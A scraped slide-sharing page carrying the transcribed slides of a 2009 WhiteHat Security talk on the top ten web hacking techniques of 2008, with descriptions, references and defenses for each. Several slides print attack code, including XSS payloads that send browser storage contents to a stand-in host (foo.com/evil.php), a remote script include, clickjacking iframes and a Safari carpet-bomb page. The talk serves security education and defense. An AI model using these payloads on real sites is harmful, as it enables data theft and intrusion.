WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 

Recently uploaded

Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Chris Swan
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
Tatiana Al-Chueyr
 
20240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 202420240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 2024
Matthew Sinclair
 
WPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide DeckWPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide Deck
Lidia A.
 
Transcript: Details of description part II: Describing images in practice - T...
Transcript: Details of description part II: Describing images in practice - T...Transcript: Details of description part II: Describing images in practice - T...
Transcript: Details of description part II: Describing images in practice - T...
BookNet Canada
 
Quantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLMQuantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLM
Vijayananda Mohire
 
Research Directions for Cross Reality Interfaces
Research Directions for Cross Reality InterfacesResearch Directions for Cross Reality Interfaces
Research Directions for Cross Reality Interfaces
Mark Billinghurst
 
UiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs ConferenceUiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs Conference
UiPathCommunity
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
Stephanie Beckett
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
KAMAL CHOUDHARY
 
20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
Sally Laouacheria
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
Yevgen Sysoyev
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
SynapseIndia
 
7 Most Powerful Solar Storms in the History of Earth.pdf
7 Most Powerful Solar Storms in the History of Earth.pdf7 Most Powerful Solar Storms in the History of Earth.pdf
7 Most Powerful Solar Storms in the History of Earth.pdf
Enterprise Wired
 
Choose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presenceChoose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presence
rajancomputerfbd
 
The Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive ComputingThe Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive Computing
Larry Smarr
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
Awais Yaseen
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
Liveplex
 
Measuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at TwitterMeasuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at Twitter
ScyllaDB
 
Implementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling  in real worldImplementations of Fused Deposition Modeling  in real world
Implementations of Fused Deposition Modeling in real world
Emerging Tech
 

Recently uploaded (20)

Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
 
20240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 202420240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 2024
 
WPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide DeckWPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide Deck
 
Transcript: Details of description part II: Describing images in practice - T...
Transcript: Details of description part II: Describing images in practice - T...Transcript: Details of description part II: Describing images in practice - T...
Transcript: Details of description part II: Describing images in practice - T...
 
Quantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLMQuantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLM
 
Research Directions for Cross Reality Interfaces
Research Directions for Cross Reality InterfacesResearch Directions for Cross Reality Interfaces
Research Directions for Cross Reality Interfaces
 
UiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs ConferenceUiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs Conference
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
 
20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
 
7 Most Powerful Solar Storms in the History of Earth.pdf
7 Most Powerful Solar Storms in the History of Earth.pdf7 Most Powerful Solar Storms in the History of Earth.pdf
7 Most Powerful Solar Storms in the History of Earth.pdf
 
Choose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presenceChoose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presence
 
The Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive ComputingThe Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive Computing
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
 
Measuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at TwitterMeasuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at Twitter
 
Implementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling  in real worldImplementations of Fused Deposition Modeling  in real world
Implementations of Fused Deposition Modeling in real world
 

Top Ten Web Hacking Techniques (2008)

  • 1. Top Ten Web Hacking Techniques 2008 Jeremiah Grossman Founder & Chief Technology Officer
  • 2. Top Ten Web Hacking Techniques (2008) Jeremiah Grossman • WhiteHat Security Founder & CTO • Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007) • Frequent international conference speaker • Co-founder of the Web Application Security Consortium • Co-author: Cross-Site Scripting Attacks • Former Yahoo! information security officer © 2009 WhiteHat, Inc. | Page 2
  • 3. Top Ten Web Hacking Techniques (2008) WhiteHat Security • 200+ enterprise customers • Start-ups to Fortune 500 • Flagship offering “WhiteHat Sentinel Service” • 1000’s of assessments performed annually • Recognized leader in website security • Quoted hundreds of times by the mainstream press © 2009 WhiteHat, Inc. | Page 3
  • 4. Top Ten Web Hacking Techniques (2008) MUST be able to protect against MUST be able to protect against HOSTILE WEB USER HOSTILE WEB PAGE © 2009 WhiteHat, Inc. | Page 4
  • 5. Top Ten Web Hacking Techniques (2008) 2008’s New Web Hacking Techniques 65 (2006) 83 (2007) http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques- of-2008.html 70 (2008) © 2009 WhiteHat, Inc. | Page 5
  • 6. Top Ten Web Hacking Techniques (2008) CUPS Detection Firefox cross-domain information theft (simple text strings, some CSV) CSRFing the uTorrent plugin Firefox 2 and WebKit nightly cross-domain image theft Clickjacking / Videojacking Browser's Ghost Busters Bypassing URL AuthC and AuthZ with HTTP Verb Tampering Exploiting XSS vulnerabilities on cookies I used to know what you watched, on YouTube Breaking Google Gears' Cross-Origin Communication Model Safari Carpet Bomb Flash Parameter Injection Flash clipboard Hijack Cross Environment Hopping Flash Internet Explorer security model bug Exploiting Logged Out XSS Vulnerabilities Frame Injection Fun Exploiting CSRF Protected XSS Free MacWorld Platinum Pass? Yes in 2008! ActiveX Repurposing Diminutive Worm, 161 byte Web Worm Tunneling tcp over http over sql-injection SNMP XSS Attack Arbitrary TCP over uploaded pages Res Timing File Enumeration Without JavaScript in IE7.0 Local DoS on CUPS to a remote exploit via specially-crafted webpage Stealing Basic Auth with Persistent XSS JavaScript Code Flow Manipulation Smuggling SMTP through open HTTP proxies Common localhost dns misconfiguration can lead to quot;same sitequot; scripting Collecting Lots of Free 'Micro-Deposits' Pulling system32 out over blind SQL Injection Using your browser URL history to estimate gender Dialog Spoofing - Firefox Basic Authentication Cross-site File Upload Attacks Skype cross-zone scripting vulnerability Same Origin Bypassing Using Image Dimensions Safari pwns Internet Explorer HTTP Proxies Bypass Firewalls IE quot;Print Table of Linksquot; Cross-Zone Scripting Vulnerability Join a Religion Via CSRF A different Opera Cross-domain leaks of site logins via Authenticated CSS Abusing HTML 5 Structured Client-side Storage JavaScript Global Namespace Pollution SSID Script Injection GIFAR DHCP Script Injection HTML/CSS Injections - Primitive Malicious Code File Download Injection Hacking Intranets Through Web Interfaces Navigation Hijacking (Frame/Tab Injection Attacks) Cookie Path Traversal UPnP Hacking via Flash Racing to downgrade users to cookie-less authentication Total surveillance made easy with VoIP phone MySQL and SQL Column Truncation Vulnerabilities Social Networks Evil Twin Attacks Building Subversive File Sharing With Client Side Applications Recursive File Include DoS Firefox XML injection into parse of remote XML Multi-pass filters bypass Session Extending Code Execution via XSS Redirector’s hell Persistent SQL Injection JSON Hijacking with UTF-7 SQL Smuggling Abusing PHP Sockets CSRF on Novell GroupWise WebAccess © 2009 WhiteHat, Inc. | Page 6
  • 7. Top Ten Web Hacking Techniques (2008) Flash Parameter Injection Flash Parameter Injection introduces a new way to inject values to global parameters in Flash movies while the movie is embedded in it's original HTML environment. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate 10 attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded. By: Yuval Baror, Ayal Yogev, and Adi Sharabani http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html http://blog.watchfire.com/FPI.pdf © 2009 WhiteHat, Inc. | Page 7
  • 8. Top Ten Web Hacking Techniques (2008) How it works There are several different FPI variants. Most of the variants include tricking the server into sending back a page where user input is interpreted as Flash parameters. This allows an attacker to inject malicious global parameters to the Flash movie and exploit Flash specific vulnerabilities. ActionScript 2 code reading a global variable © 2009 WhiteHat, Inc. | Page 8
  • 9. Top Ten Web Hacking Techniques (2008) Passing arguments in an embedded URI Passing arguments using 'flashvars' DOM-based Flash parameter injection © 2009 WhiteHat, Inc. | Page 9
  • 10. Top Ten Web Hacking Techniques (2008) Persistent Flash Parameter Injection © 2009 WhiteHat, Inc. | Page 10
  • 11. Top Ten Web Hacking Techniques (2008) Defenses User input must be sanitized according to context before reflected back to the user. Extreme caution should be taken when saving user input in Flash cookies. © 2009 WhiteHat, Inc. | Page 11
  • 12. Top Ten Web Hacking Techniques (2008) ActiveX Repurposing Multi-staged attack to get code execution on victims who were running 9 a vulnerable and popular SSL-VPN ActiveX control. By: Haroon Meer http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html http://www.sensepost.com/blog/2237.html http://www.networkworld.com/news/2008/080708-black-hat-ssl-vpn-security.html © 2009 WhiteHat, Inc. | Page 12
  • 13. Top Ten Web Hacking Techniques (2008) How it works © 2009 WhiteHat, Inc. | Page 13
  • 14. Top Ten Web Hacking Techniques (2008) 1. Client with control visits malicious page 2. Page instantiates control and offers an upgrade 3. new-config.txt downloads to c:predictable_locationnew-config.txt 4. Malicious page re-instantiates control with ini file == c:predictable_locationnew- config.txt [new-config contains arbitrary commands as uninstall string] 5. Exectute the controls uninstall method: 6.The victims machine fires calc.exe &&. © 2009 WhiteHat, Inc. | Page 14
  • 15. Top Ten Web Hacking Techniques (2008) Defenses Website: ActiveX should make use of Sitelock wherever possible. Web Browser: Restrict ActiveX to the maximum degree possible. © 2009 WhiteHat, Inc. | Page 15
  • 16. Top Ten Web Hacking Techniques (2008) Tunneling TCP over HTTP over SQL-Injection Create a TCP circuit through reDuh over squeeza by building the 8 server component within SQL Servers CLR subsystem. By: Glenn Willinson, Marco Slaviero and Haroon Meer http://www.sensepost.com/research/reDuh/SensePost_2008.tgz © 2009 WhiteHat, Inc. | Page 16
  • 17. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 17
  • 18. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 18
  • 19. Top Ten Web Hacking Techniques (2008) Defenses Good network architecture, solid application design, database hardening. © 2009 WhiteHat, Inc. | Page 19
  • 20. Top Ten Web Hacking Techniques (2008) Cross-domain leaks of site logins via Authenticated CSS Checks the contents of a stylesheet property value across domains. 7 The most reliable technique to determine whether the victim is logged- in to a given website or not. By: Chris Evans and Michal Zalewski http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html © 2009 WhiteHat, Inc. | Page 20
  • 21. Top Ten Web Hacking Techniques (2008) How it works Perform a cross-domain load of a stylesheet and then reading property values using standard Javascript APIs. What makes it work on so many sites is that browsers will load inline style definitions from HTML documents. In addition, stylesheet properties differ wildly depending on whether a user is logged in or not. <html><head> <link rel=quot;stylesheetquot; href=quot;http://home.myspace.com/index.cfm?fuseaction=userquot;/> <script> function func() { var ele = document.getElementById('blah'); alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom')); } </script></head> <body onload=quot;func()quot;> <div id=quot;blahquot; class=quot;showquot;> </body> </html> © 2009 WhiteHat, Inc. | Page 21
  • 22. Top Ten Web Hacking Techniques (2008) Defenses As a Web application, do not store anything sensitive (such as user- identifying customizations) in stylesheet properties. If you must, make sure to store the properties in their own CSS file and ensure the URL of that file unguessable to attackers for a given victim user. © 2009 WhiteHat, Inc. | Page 22
  • 23. Top Ten Web Hacking Techniques (2008) Abusing HTML 5 Structured Client-side Storage HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through the browser. Attackers could steal or modify sensitive data online or offline. If a web application which uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an 6 attack payload to read or modify the content of known storage keys (session storage, global storage, local storage or database storage) on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it. By: Alberto Trivero http://trivero.secdiscover.com/html5whitepaper.pdf © 2009 WhiteHat, Inc. | Page 23
  • 24. Top Ten Web Hacking Techniques (2008) How it works Storage Object Enumeration var ss = quot;quot;; for(i in window.sessionStorage) { ss += i + quot; quot;; } var ls = quot;quot;; for(i = 0; i < localStorage.length; i++) { ls += localStorage.key(i) + quot; quot;; } Database Object Enumeration var db = quot;quot;; for(i in window) { if(window[i] == “[object Database]”) { db += i + “ “; } } © 2009 WhiteHat, Inc. | Page 24
  • 25. Top Ten Web Hacking Techniques (2008) Extracting Database Metadata SELECT name FROM sqlite_master WHERE type='table' SELECT sql FROM sqlite_master WHERE name='table_name' SELECT sqlite_version() © 2009 WhiteHat, Inc. | Page 25
  • 26. Top Ten Web Hacking Techniques (2008) One Shot Attack http://example.com/page.php?name=<script>document.write('<img src=quot;http://foo.com/ evil.php?name=' %2B globalStorage[location.hostname].mykey %2B 'quot;>');</script> http://example.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (quot;SELECT * FROM client_tbquot;, [], function(tx, result){ document.write('<img src=quot;http:// foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B 'quot;>'); }); });</script> © 2009 WhiteHat, Inc. | Page 26
  • 27. Top Ten Web Hacking Techniques (2008) http://example.com/page.php?name=<script src=http://foo.com/evil.js></ script> © 2009 WhiteHat, Inc. | Page 27
  • 28. Top Ten Web Hacking Techniques (2008) Defenses Website: Avoid saving sensitive data on the users machine and clear the client-side storage whenever possible. Web Browser: Web users should check regularly the content of the HTML5 client-side storage saved by their browser (delete?). LSO Storage Locations: Windows XP $userApplication DataMacromediaFlash Player#SharedObjects Windows Vista $userAppDataRoamingMacromediaFlash Player#SharedObjects Mac OS X ~/Library/Preferences/Macromedia/Flash Player/#SharedObjects Linux /home/$user/.macromedia/Flash_Player/#SharedObjects © 2009 WhiteHat, Inc. | Page 28
  • 29. Top Ten Web Hacking Techniques (2008) A Different Opera Exploit an XSS in opera:feature scheme leading to code execution by abusing same origin policy. By: Stefano Di Paola http://www.wisec.it/sectou.php?id=49102ef18b7f3 http://aviv.raffon.net/2008/10/30/ADifferentOpera.aspx http://seclists.org/fulldisclosure/2008/Oct/0401.html 5© 2009 WhiteHat, Inc. | Page 29
  • 30. Top Ten Web Hacking Techniques (2008) How it works 1) CSRF a user from evilhost to opera:historysearch • Pre-existing XSS in opera:historysearch leads to writing in opera:* context. SOP matching is evaluated by comparing        scheme1 + host1 + port1 == scheme2 + host2 + port2 opera:* considered as:        opera + null + null 2) Inject IFRAME to opera:config change the email client to arbitrary command 3) Open a window pointing to a quot;mailtoquot; scheme. © 2009 WhiteHat, Inc. | Page 30
  • 31. Top Ten Web Hacking Techniques (2008) Defenses Upgrade to Opera => 9.62 © 2009 WhiteHat, Inc. | Page 31
  • 32. Top Ten Web Hacking Techniques (2008) Clickjacking / Videojacking Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue. 4 Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to. By: Jeremiah Grossman and Robert Hansen http://www.sectheory.com/clickjacking.htm http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html http://blogs.adobe.com/psirt/2008/10/clickjacking_security_advisory.html © 2009 WhiteHat, Inc. | Page 32
  • 33. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 33
  • 34. Top Ten Web Hacking Techniques (2008) Hover Invisible IFRAMEs HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content. <iframe src=quot;http://victim/page.htmlquot; scrolling=quot;noquot; frameborder=quot;0quot; style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;quot;> </iframe> © 2009 WhiteHat, Inc. | Page 34
  • 35. Top Ten Web Hacking Techniques (2008) What if a Web page could See and Hear you? Clickjacking enables corporate espionage, government surveillance, home user spying, etc. Every computer with a webcam and/or a microphone becomes a remote monitoring device. JavaScript can’t access the webcam or microphone... © 2009 WhiteHat, Inc. | Page 35
  • 36. Top Ten Web Hacking Techniques (2008) <div style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9quot;> <embed src=quot;vid.swfquot; type=quot;application/x-shockwave-flashquot; allowfullscreen=quot;falsequot; wmode=quot;transparentquot;> </embed> </div> © 2009 WhiteHat, Inc. | Page 36
  • 37. Top Ten Web Hacking Techniques (2008) Defenses Frame-busting code <script> if (window.top !== window.self) { setTimeout(function() {document.body.innerHTML='';},1);window.self.onload=function(evt) {document.body.innerHTML='';};} </script> /* IE 8 Only */ X-FRAME-OPTIONS: (DENY | SAMEORIGIN) • Upgrade to Flash Player 10 • NoScript w/ ClearClick © 2009 WhiteHat, Inc. | Page 37
  • 38. Top Ten Web Hacking Techniques (2008) Safari Carpet Bomb The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and malware. This vulnerability has the distinction of bringing the term quot;blended threatquot; into the 3 security vernacular because, if you are able to litter user's machines with arbitrary files, you can further the impact and affect other applications that trust content on the local filesystem. By: Nitesh Dhanjani http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx © 2009 WhiteHat, Inc. | Page 38
  • 39. Top Ten Web Hacking Techniques (2008) How it works When the Safari browser is served a file with a content-type that cannot be rendered by the browser, it automatically downloads it do the default download location (desktop on Windows, Downloads directory on OSX) without notifying or asking the user. This allows a malicious website to litter the user's Desktop or download directory with arbitrary files, including malware. <HTML> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> ... ... <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> </HTML> © 2009 WhiteHat, Inc. | Page 39
  • 40. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 40
  • 41. Top Ten Web Hacking Techniques (2008) Defenses Windows: Download the latest version of Safari OS X: Versions of Safari remain un-patched by Apple. © 2009 WhiteHat, Inc. | Page 41
  • 42. Top Ten Web Hacking Techniques (2008) Breaking Google Gears' Cross- Origin Communication Model Under some circumstances the cross-origin communication security model 2 of Google Gears could be bypassed. An attacker could gain access to sensitive resources of the victim in other websites (even those that does not use Google Gears) - mainly ones that contain users' content (forums, web- mails, social networks, office-like services, etc.). By: Yair Amit http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html © 2009 WhiteHat, Inc. | Page 42
  • 43. Top Ten Web Hacking Techniques (2008) Google Gears Workers var wp = google.gears.workerPool; wp.allowCrossOrigin(); wp.onmessage = function(a, b, message) { var request = google.gears.factory.create('beta.httprequest'); request.open('GET', 'http://TARGET.SITE/SENSITIVE_PAGE.htm'); request.onreadystatechange = function() { if (request.readyState == 4) { wp.sendMessage(quot;The response was: quot; + request.responseText, message.sender); } }; request.send(); } © 2009 WhiteHat, Inc. | Page 43
  • 44. Top Ten Web Hacking Techniques (2008) Attack Flow  1. Attacker creates a text file that contains (malicious) Google Gears commands (Accessing the DB, using the HttpRequest module, etc.). 2. Attacker finds a way to put the text content into a target domain (http:// TARGET.SITE/Upload/innocent.jpg). The Gears quot;workerquot; code does not contain suspicious characters (<,>, etc...), it is therefore less likely to be filtered by http:// TARGET.SITE's server-side logic. 3. Attacker creates http://ATTACKER.SITE/attack.html which contains some Google Gears code that loads and executes http://TARGET.SITE/Upload/innocent.jpg 4. The code embedded in innocent.jpg runs in the context of http://TARGET.SITE. It therefore has permissions to access Google Gears client-side objects such as the DB, the local server data or web resources (with the victim's credentials) using the HttpRequest module built into Google Gears. 5. All information collected in the previous phase can easily be leaked back to http:// ATTACKER.SITE using Google Gears' standard messaging mechanism. © 2009 WhiteHat, Inc. | Page 44
  • 45. Top Ten Web Hacking Techniques (2008) Defenses Update Google Gears. (Content-Type header value (application/x-gears-worker) Web developers who rely on Google Gears should be aware that the fix might require some changes, such as creating a special rule in the Web server for serving Google-Gears worker code files. © 2009 WhiteHat, Inc. | Page 45
  • 46. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 46
  • 47. Top Ten Web Hacking Techniques (2008) GIFAR A content ownership issue taking advantage of flimsy security controls on both the server side and the client side. What's new is appending a Java Applet (in the form of a JAR) at the end of another file that would be commonly allowed in file uploads 1 on web applications, such as images, word documents, audio/video files, just about anything. By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman http://riosec.com/how-to-create-a-gifar http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/ http://blogs.zdnet.com/security/?p=1619 © 2009 WhiteHat, Inc. | Page 47
  • 48. Top Ten Web Hacking Techniques (2008) How it works GIF JAR © 2009 WhiteHat, Inc. | Page 48
  • 49. Top Ten Web Hacking Techniques (2008) Defenses Website: Do not accept file uploads Host uploaded content on throw away domains or IP addresses Convert all content Web Browser: a) Disable third-party browser extensions b) Install the latest JVM and remove older versions © 2009 WhiteHat, Inc. | Page 49
  • 50. Thank You! Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com WhiteHat Security http://www.whitehatsec.com/